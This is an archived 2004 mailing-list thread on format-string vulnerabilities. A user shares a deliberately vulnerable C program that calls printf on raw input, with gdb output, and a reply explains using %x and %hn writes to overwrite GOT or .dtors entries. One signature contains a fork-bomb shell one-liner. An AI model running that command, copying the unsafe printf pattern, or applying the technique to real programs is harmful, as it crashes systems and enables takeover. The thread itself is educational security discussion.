Vulnerability Development mailing list archives
Re: Help, problems finding addresses with format strings
From: Vade 79 <v9 () fakehalo deadpig org>
Date: 20 Feb 2004 06:21:14 -0000
In-Reply-To: <20040219132347.GA26946@x0riguer> the idea is to use the data in the(any) buffer you can write to as a user in conjunction with %n/etc formatting...you do not need to know the location of the buffer(vuln[1024]) you are using in this case, but you do need a location to write to(new memory address, anywheres in memory)...you usually will want to use %n/etc to overwrite GOT(global offset table) function addresses or .dtors...which will give you control of the program. so basically you use %x's, when testing, until you see the actual data in vuln[1024]...in your case it appears to be 4...just to get you on the right track, there are several how-to's out there.. google has many informative responses. (by %n i really mean %hn, you will usually need to use half numbers and overwrite the address in two 16bit(2 charactars) parts...this is the popular method used for generic format bugs) ...sorry for my bad english, but i'm american :P
Hello, Having some experience with BOF, i decided to read some docs about format strings vulnerabilities, but... my surprise is that, by any reason, i can't find anything seemed to this doc, i'd like some experience to help me. My system is a Debian/GNULinux sid with gcc 3.3.3 Look at this simple (aparently) code: --- #include <stdio.h> #include <string.h> #include <unistd.h> main () { char vuln[1024]; bzero(vuln,1024); printf("vuln program\n\n"); printf("enter some string:"); fflush(stdout); read(0,vuln,1024); printf(vuln); } --- We compile it and execute it... When program asks for string, we want to guess stack region... enter some string:%x %x %x %x bffff4d0 400 2 25207825 - This addresses are: [x0riguer]:~/Projects/fstrings$ gdb -q ./fsvuln (gdb) disas main Dump of assembler code for function main: 0x08048424 <main+0>: push %ebp 0x08048425 <main+1>: mov %esp,%ebp 0x08048427 <main+3>: sub $0x418,%esp ... ... 0x08048499 <main+117>: call 0x8048328 0x0804849e <main+122>: leave 0x0804849f <main+123>: ret End of assembler dump. (gdb) break *0x08048499 Breakpoint 2 at 0x8048499: file fsvuln.c, line 16. (gdb) r Starting program: /home/yeyu/Projects/fstrings/fsvuln vuln program enter some string:%x %x %x %x Breakpoint 2, 0x08048499 in main () at fsvuln.c:16 16 printf(vuln); (gdb) x/10wx $esp 0xbffff4c0: 0xbffff4d0 0xbffff4d0 0x00000400 0x00000002 0xbffff4d0: 0x25207825 0x78252078 0x0a782520 0x00000000 0xbffff4e0: 0x00000000 0x00000000 ... * If we can guess the string of 0xbffff4d0 ... ... (gdb) x/s 0xbffff4d0 0xbffff4d0: "%x %x %x %x\n" Now ... i think where the char vuln[1024] starts, in 0xbffff4d0 no?, i want to overwrite this buffer and theorically overwrite main ret address by other. 1- How can I guess (theorically and practically) this ret address in the stack ? (i think is in stack) 2- When i have the value of the ret address, i think i have to overwrite by techniques like %8x and %n, isn't it? Help me to solve this problem please... Thank you -- =-------------------------------------------------= ** yn0 [yeyuno () bigfoot com] ** =------[ echo "\$0&\$0">_;chmod +x _;./_ ]--------=
Current thread:
- Help, problems finding addresses with format strings YeYu (Feb 19)
- <Possible follow-ups>
- Re: Help, problems finding addresses with format strings Vade 79 (Feb 20)
- Re: Help, problems finding addresses with format strings Marco Ivaldi (Feb 20)